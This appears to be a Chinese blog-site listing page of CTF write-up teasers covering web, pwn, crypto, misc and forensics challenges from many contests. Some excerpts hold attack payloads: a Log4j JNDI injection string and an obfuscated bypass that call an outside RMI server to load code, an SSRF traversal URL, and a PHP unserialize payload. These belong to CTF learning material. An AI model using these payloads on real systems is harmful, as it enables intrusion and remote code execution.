writeup 第10页

VishwaCTF 2022 部分writeup

VishwaCTF2022部分writeupGeneralTrivia1Trivia2Trivia3WebHeyBuddy!

shu天·2022-06-28 14:25

第四届2021美团网络安全 MT-CTF writeup

第四届2021美团网络安全MT-CTF文章目录第四届2021美团网络安全MT-CTFMISCUn(ix)zip오징어게임鱿鱼游戏BoomCryptoSymbolMISCUn(ix)zipflag{Welc0me_Unz1p_Wonder4}오징어게임鱿鱼游戏7-zip可以看到加密算法ZipCryptoStore再加上备注里提示flagornot.txt，采用明文爆破明文爆破参考：https://b

shu天·2022-06-28 14:24

[西湖论剑2021中国杭州网络安全技能大赛]Yusa的秘密 writeup

[西湖论剑2021]Yusa的秘密Sakura组织即将进攻地球，此时你意外得到了该组织内某个成员的电脑文件，你能从中发现本次阴谋所用的关键道具吗。（注：题目中包含了五个彩蛋，且彩蛋对解题本身没有任何影响，快去发现吧！）附件：Who_am_I.zip，Yusa-PC.rawYusa-PC.raw是内存镜像首先pslist.\volatility_2.6_win64_standalone.exe-fD

shu天·2022-06-28 14:54

Dest0g3 520迎新赛Misc Pngenius WriteUp

开局一张图片，老规矩binwalk分析一波。binwalk11.png隐写了flag.txt，flag应该就在里面。binwalk-e11.png把文件提取出来压缩包先看看是不是伪加密，不然上下其手一番后，发现他是伪加密=_=看来是真加密，下面想办法得到压缩包密码。能开锁的除了钥匙，还有锤子呀_暴力破解一下，看着逐渐诡异的payload。。。此路不通，换个方法那密码应该就在题目给的文件里。再回头看

okaeri_·2022-06-28 14:54

【Dest0g3 520迎新赛】web部分writeup

1NDEX0x00前言0x01简练wpPhpdestEasyphpSimplerceEasysstiPharpopFunny_uploadMiddleNodesoeasyEZIP(赛后)0x02rethink0x00前言本来想着赛前练手的，没想到被练了…0x01简练wpPhpdest访问日志可包含直接getshellEasyphp触发error直接得flagSimplerce进制编码绕过str_i

k_du1t·2022-06-28 14:22

BUU Dest0g3 520迎新赛 WEB writeup

WEBphpdest"24")or($timme>"31")or($timmme>"60")){echo$fl4g;}else{echo"Tryharder!";}set_error_handler(function()use(&$fl4g){print$fl4g;});$fl4g.=$dest0g3;?>搞了个自定义错误处理函数，让他报错就行，下面有个字符串拼接，传值数组即可SimpleRCE'

Arnoldqqq·2022-06-28 14:20

Dest0g3 520迎新赛 writeup (misc部分 + web部分)

Dest0g3520迎新赛文章目录Dest0g3520迎新赛MISCWelcometofxxkingDestCTF你知道js吗StrangeTrafficPngeniusEasyWordEasyEncodePython_jailrookiehacker-1rookiehacker-24096WEBEasySSTIphpdestEasyPHPSimpleRCEfunny_uploadmiddlePh

shu天·2022-06-28 14:57

CTFweb相关靶场推荐与环境配置

国庆假期少事情多就不更新了今天来一波猛的想起来没有给大家推荐过实战的平台今天来安利一波这篇很长相比上一篇sqlmap的配置而言内容很多有问题的小伙伴欢迎留言哦在线练习平台bugkuXCTF攻防世界比较基础的两个网站题目有很多并且网上有很多题目的writeup

k1ling·2022-06-12 20:37

hgame 2022 PWN 部分题目 Writeup

文章目录Level-Week1enter_the_pwn_landenter_the_evil_pwn_landtest_your_nctest_your_gdbLevel-Week2oldfashion_noteLevel-Week3changeable_noteelder_notesized_noteLevel-Week1enter_the_pwn_land#encoding=utf-8fro

拾光丶·2022-05-30 07:52

2020CISCN初赛-crypto-lfsr writeup

第十三届全国大学生信息安全竞赛初赛，密码学的lfsr详解。原题文件：https://wwe.lanzous.com/iDF95gntw5a本题考查线性反馈移位寄存器。初始状态，反馈函数，输出序列都已给出，已知n是100。输出序列即题给的output.txt。反馈函数是代码形式，需要经过分析后转化为表达式形式。通过分析反馈函数可以发现，初始状态即是输出序列的前100位倒置。lfsr源代码如下，def

lnjoy·2022-05-30 07:21

CISCN2021-第十四届全国大学生信息安全竞赛-WriteUp

WriteUp-Maple_root-CISCN2021总结总得分：3400总排名：203赛区排名：21第一次认真参加正式的CTF，24+3小时的脑血栓比赛时长，收获还是很多的。

「已注销」·2022-05-30 07:17

第14届(2021)CISCN初赛WP（1）——easy_source

easy_sourceWriteUp题目打开没发现啥，就先看看index.php，还是没有什么变化。这时候想起来前段时间遇到过考敏感文件的。

RangerKnight·2022-05-30 07:46

第15届全国大学生知识竞赛场景实操 2022ciscn初赛部分writeup

文章目录Crypto签到电台基于挑战码的双向认证1基于挑战码的双向认证2基于挑战码的双向认证3Miscez_usbeverlasting_night问卷babydiskWebEzpopCrypto签到电台签到，发送消息先，得到题目“弼时安全到达了”所对应的7个电码：1732251413440356045166710055模十算法示例：1732与6378得到7000发包示例：/send?msg=s与

是Mumuzi·2022-05-30 07:43

Me-and-My-Girlfriend-1靶机的Writeup

Me-and-My-Girlfriend-1靶机的Writeup实验工具实验内容第一步用扫描靶机ip第二步用nmap探测端口实验工具kali2020Me-and-My-Girlfriend-1靶机实验内容第一步用扫描靶机

盖世大宝剑a·2022-05-19 11:54

2021美亚个人赛复盘（进度：FTP，路由器、工地主管计算机）

有的不太会的看的是钉钉里美亚发的官方wp和2021第七届美亚杯中国电子数据取证大赛详解writeup_奇乃正的博客-CSDN博客_美亚杯Individual需要用veracrypt加挂一下（HfsCk]

五五六六0524·2022-05-18 10:37

第二届“网刃杯”网络安全大赛部分writeup

第二届“网刃杯”网络安全大赛部分writeupICSeasyiecwebsign_inuploadez_javaMisc玩坏的winxp本文来自csdn的⭐️shu天⭐️，平时会记录ctf、取证和渗透相关的文章

shu天·2022-05-13 12:16

第二届“网刃杯”WriteUp

第二届“网刃杯”网络安全大赛--下面是我们(菜鸟一号战队)的一些解题思路不是很完美，希望对大家有用！WEB2-UPLOAD这里上传一个后缀名以.php文件，使用Burp抓包根据提示更改上传类型-Content-Type:ctf点击发送上传文件查询到注入点，报错注入,这里有截断，要拼接一下；获取FLAGFlag：{5937a0b90b5966939cccd369291c68aa}ICS4-Caref

脑袋困掉了、·2022-05-13 12:08

全国大学生信息安全竞赛初赛writeup（历年CISCN真题与解析）

文章目录第十四届（2021年）第十三届（2020年）第十二届（2019年）第十届（2017年）收录了大佬们参加全国大学生信息安全竞赛初赛的writeup，方便学习，排名不分先后，谨参考完整度和CSDN站内优先原则

Hardworking666·2022-05-13 12:26

2022网刃杯个人向WP ICS/Reverse easyiec,freestyle,ez_algorithm writeup

ICSeasyiec虚假的签到题与真正的签到题.jpg打开方式切到记事本Ctrl+F直接搜flag梭哈REVERSEfreestyle简单逆向算法题f5主函数一个fun1一个fun2先跟进fun1输入一个值经过处理后得到4400atoi()这个函数百度了一下跟int()差不多数学题4*(3*int(s)/9-9)==4400得到s=3327记一下到fun2提示里给到Thecodevalueisth

练习两年半的吹头发练习生·2022-04-29 15:11

第二届网刃杯网络安全大赛 Writeup

文章目录MISC玩坏的winxpICSeasyiecxyp07carefulguy喜欢移动的黑客ncsubjLED_BOOM题目附件：链接：https://pan.baidu.com/s/1XlA0tSNwSFr7Lj7WTMT5cw提取码：pteg-----------------------------------------------------其中部分压缩包有加密密码是赛事官方设置《玩坏

末初·2022-04-29 15:32

深入理解计算机系统(CSAPP) 实验详解：CacheLab

知识预热阅读《深入理解计算机系统》的6.4仔细阅读Cachelab的writeup介绍完上面必须

Jackson1997__·2022-04-27 11:23

2022第二届网刃杯writeup

文章目录MISC玩坏的winxpICSeasyiec喜欢移动的黑客carefulguyxyp07re定时启动ez_algorithmRe_functionfreestylewebSign_inuploadez_java这次re做了4个，ICS做了3个，wp直接贴战队的了。MISC玩坏的winxp1、虚拟机加载硬盘2、MagnetAXIOM收集信息发现了网页浏览历史中的特殊网址。3、meiren.p

拾光丶·2022-04-26 11:40

Securinets CTF Quals 2022 Forensics Writeup

文章目录ForensicsmalWhale题目大小：mal:2GWhale:2.2Ggoogle链接：mal:https://drive.google.com/file/d/16rzauO0LMyRGLg3-wer2fJ8Ixq-yMmLt/viewWhale:https://drive.google.com/file/d/1Z89cnqKt0dvLLIstsX5D_Cl8j02YVT_8/vie

是Mumuzi·2022-04-25 08:35

N1CTF2021 Collision exp解析write up

N1CTF2021Collisionexp解析writeupCollision本人并没有在n1ctf2021中做出这道题，本文的最终exp是根据出题人提供的exp修改得到的。

AliceNCsyuk·2022-04-19 07:26

XCTF-L3HCTF2021 DeepDarkFantasy write up

XCTF-L3HCTF2021DeepDarkFantasywriteupDeepDarkFantasy题目描述和hint如下原始附件如下：链接：https://pan.baidu.com/s/1Rs1A6viKUXuNvxExAvtvSQ

AliceNCsyuk·2022-04-19 07:56

int_overflow [XCTF-PWN]CTF writeup系列9

题目地址：int_overflow先看看题目内容：这道题目的名字已经把漏洞说明白了，就是整数溢出漏洞那我们就照例下载文件，检查保护机制root@mypwn:/ctf/work/python#checksecabd631bc00e445608f5f2af2cb0c151a[*]'/ctf/work/python/abd631bc00e445608f5f2af2cb0c151a'Arch:i386-3

3riC5r·2022-04-19 07:49

level_0 [XCTF-PWN]CTF writeup系列5

题目地址：level_0先看下题目：照例查看一下保护情况root@mypwn:/ctf/work/python#checksecdf928e471d0849fab9ff0ebe4bfe5ea1[*]'/ctf/work/python/df928e471d0849fab9ff0ebe4bfe5ea1'Arch:amd64-64-littleRELRO:NoRELROStack:Nocanaryfou

3riC5r·2022-04-19 07:49

hello_pwn [XCTF-PWN]CTF writeup系列4

题目：hello_pwn先看下题目照例，检查一下保护情况，反编译程序root@mypwn:/ctf/work/python#checksecc0a6dfb32cc7488a939d8c537530174d[*]'/ctf/work/python/c0a6dfb32cc7488a939d8c537530174d'Arch:amd64-64-littleRELRO:PartialRELROStack:

3riC5r·2022-04-19 07:48

XCTF攻防世界Web新手入门题大全

XCTF攻防世界Web之WriteUp无图版（Tips：有图版本，请移步我的资源，自行下载doc文档）0x00准备【内容】在xctf官网注册账号，即可食用。

csdn616473424·2022-04-09 06:23

2021年第四届“安洵杯”网络安全挑战赛Writeup

Misc应该算是签到B站搜索直接搜索这个BV号PS：出题人品味不错，我也喜欢酷玩的这首《Yellow》直接页面Ctrl+F没找出来搜索引擎找一下有没有通过API查弹幕的方法：https://www.bilibili.com/read/cv7923601F12点击Network，找到这个视频的cid从当前时间2021-11-27开始往前找https://api.bilibili.com/x/v2/d

Le1a·2022-03-28 07:57

2021DASCTF八月挑战赛Writeup

2021DASCTF八月挑战赛WriteupMISC签到寒王'sblogstealerCRYPTOeasymathlet'splaywithrsa~ezRSAMISC签到看看公告就有啦(嘿嘿嘿，真-签到题

citytwilight·2022-03-28 07:56

2021GKCTF X DASCTF应急挑战杯部分Writeup

1.签到尝试了一波发现是16进制的base64编码，并且base64编码被反转了。a='wIDIgACIgACIgAyIK0wIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMiCNoQD'b='jMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjMyIjoQDjACIgACIgACIggDM6EDM6AjMgAzMtMDMtEjM

KogRow·2022-03-28 07:53

DASCTF Sept X 浙江工业大学秋季挑战赛 writeup

crypto-welcome签到已知n、m、c求e，sage脚本m=73964803637492582853353338913523546944627084372081477892312545091623069227301c=21572244511100216966799370397791432119463715616349800194229377843045443048821n=2**256e=

拾光丶·2022-03-28 07:23

Code Breaking 挑战赛 Writeup

作者：LoRexxar’@知道创宇404实验室时间：2018年12月7日如果你想第一时间了解漏洞资讯，可以关注我们的知道创宇Paper：https://paper.seebug.org/755/@phith0n在代码审计小密圈二周年的时候发起了Code-BreakingPuzzles挑战赛，其中包含了php、java、js、python各种硬核的代码审计技巧。在研究复现thejs的过程中，我花费了

知道创宇KCSC·2022-03-28 07:53

首届安徽省“追日杯”大学生网络安全挑战赛WriteUp

第六，应该能混个三等奖题量很大，打的人少，很多题都是0解，Reverse全0解，其他方向大都是个位数，综合渗透那里，题特别多，做了一个第一题就没做了，也挺难的，但是分还很低。怪怪的。Webgotofly题目一直重定向，即使到了flag页面，立即刷新也看不见，BP直接抓包，一页一页翻就行了Miscchess半自动化脚本#--coding=utf8--frompwnimport*io=remote("

Tajang·2022-03-28 07:22

2021DASCTF实战精英夏令营暨DASCTF July X CBCTF 4th WriteUp

最后十分钟掉了4名可还行只写自己做了的，队友出的就不写了题目：Crypto：Yusa的密码学签到——BlockTrickMISC：5道+1道赛后复现(共6道)WEB：ezrce、catflag、easythinkphp、jspxcms、cybercmsCrypto：Yusa的密码学签到——BlockTrick不知道啥意思，反正暂且当复读机就行了。MISC-问卷题DASCTF{79f3bb47a2e

是Mumuzi·2022-03-28 07:22

2022HWS硬件安全冬令营 X DASCTF Jan部分Writeup

文章目录MISCbadPDFgogogoPWN送分题CRYPTObabyrsaMISCbadPDF首先是一个lnk的windows快捷方式，使用windows打开，会看到一个一闪而过的cmd，然后打开了一个pdf。运行之后文件的结构似乎会发生改变，看了下快捷方式的指向内容发现了东西。%SystemRoot%\system32\cmd.exe/ccopy"20200308-sitrep-48-cov

塞纳河畔的春水·2022-03-28 07:52

2022 Real World CTF体验赛Writeup

还是太菜了不配打RealWorld正赛(神仙打架)，打打体验赛压压惊。log4flag提示log4j，测试payload：${jndi:rmi://xxx.dnslog.cn/Exp}存在检测,bypasspayload:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://xxx.xxx.xxx.xxx:1099/siavc8}直接搭建jndi服务，尝

keepb1ue·2022-03-28 07:21

2022DASCTF X SU 三月春季挑战赛 WriteUp

因为这次团队协作较强，所以就把团队wp直接放了(这句话读不懂也没关系，总之放wp)文章目录Misc月圆之夜[mumuzi]什么奇奇怪怪的东西[mumuzi]Hi!Hecker![mumuzi,dota_st]问卷CryptoFlowerCipher[mumuzi,Lu1u]Reeasyre[Lu1u]IoTWhat'sInTheBits[Lu1u,dota_st,mumuzi]Webezpop[a

是Mumuzi·2022-03-28 07:15

CSAPP-Lab05 Cache Lab 深入解析

在开始实验前，强烈建议先阅读以下学习资料：实验说明文档：WriteupCMU关于CacheLab的PPT：CacheLab

Deconx·2022-03-21 22:00

PWNHUB 七月内部赛 babyboa、美好的异或 Writeup

这次的PWNHUB内部赛的两道题目都不是常规题，babyboa考察的是BoaWebserver的cgi文件的利用，美好的异或考察的则是通过逆向分析解密函数来构造栈溢出ROP。两道题目的考点都非常新颖，其中第一道题更是结合了Web，值得大家复现学习。点击头顶图片！babyboa这道题的外表就是一个Web页面但是实际上他的主要内容都在cgi文件中cgi文件是使用静态编译的，这在线下比赛的题目中是非常常

Internet_xx·2022-03-11 21:05

[WriteUp]网络信息安全攻防平台-综合关3

网络信息安全攻防平台-综合关3-美图闪亮亮交友平台综合关传送门⚠️注意：这是第三题的WP需要的工具：一台部署好nginx的VPS(这里只要能用url访问就行，不一定需要nginx，nginx只是给不熟悉的提供一个参考)正文开始经典题目无用，tips先记着，直接进入环境什么都不管，先正常传一次图片试试，这个滑稽我是从我图床里扒过来的我直接好家伙，居然有回显！tip里提到没有xss，那就传马，多次尝试

Fai7y·2022-03-08 10:34

安全-Simple_SSTI1（BugkuCTF）

文章目录一、题目二、WriteUp一、题目原题链接二、WriteUp这个题目是SSTI（Server-SideTemplateInjection）服务器端模板注入查看源代码，下方提示的是flask和secret_keyflask

小狐狸FM·2022-03-07 15:44

bugku No one knows regex better than me writeup

bugkuNooneknowsregexbetterthanmewriteup这个题目是真的很折磨了分享一手思路，建议下载本地来看

影色·2022-03-07 15:12

新BugKu-web篇-Simple_SSTI_1

新BugKu-web篇-Simple_SSTI_1网上很很多的writeup，发现描述的都不是很全面，本人也是菜鸡，写一下对于这道题的理解，首先web应先看题目，再看源码，源码里没提示再看其他东西。

拼音怪兽·2022-03-07 15:05

BUUCTF笔记之Web系列部分WriteUp（四）

1.[BJDCTF2020]Marklovescatdirb扫描目录发现.git泄露。githack获取源码$y){$$x=$y;}foreach($_GETas$x=>$y){$$x=$$y;}foreach($_GETas$x=>$y){if($_GET['flag']===$x&&$x!=='flag'){exit($handsome);}}if(!isset($_GET['flag'])&

KogRow·2022-03-07 15:00

cs144 lab0 lab1记录

WriteUp吗lab0lab0要做的事，实现buffer部分的功能，要自己写变量以及实现接口。

lilinilili·2022-03-01 17:00

SWPU新生赛2021 Misc部分WriteUp

第一波放题你喜欢osu吗？打开铺面发现都是重复的操作，于是看铺面文件发现这里的变化可能对的上二进制正好和上次节奏医生的题也对的上，于是将第一行改成这玩意，跑一下写好的脚本发现确实是flag，再reverse一下就可以了f=open('RichardSchrieber-MiracleofLife(WDLJT)[Easy].osu','r').readlines()flag=''foriinf:tmp

是Mumuzi·2022-02-22 13:41

UNCTF writeup（web/misc）

webweb一共六题==我好菜easy_ssrfpayload:?url=unctf.com/…/…/…/…/flageasy_unserializepayload:1=“challengechallengechallengechallengechallengechallengechallengechallenge”;s:8:“password”;s:4:“easy”;}aaababyeval一顿

CSU_WJJJ·2022-02-22 13:41

[CTF] 攻防世界MISC高手区部分题目WriteUp（2）

记录一些有意思的题目目录索引7-2ewmMysterious-GIFcrc4433challenge_how_many_Vigenère流量分析未完待续...7-2下载解压得到一个文件夹，里面有一堆文件，对所有文件名进行base64解码#coding=utf-8importosimportbase64fornameinos.listdir("/root/桌面/problem"):printname

berdb·2022-02-22 13:11

推荐频道

writeup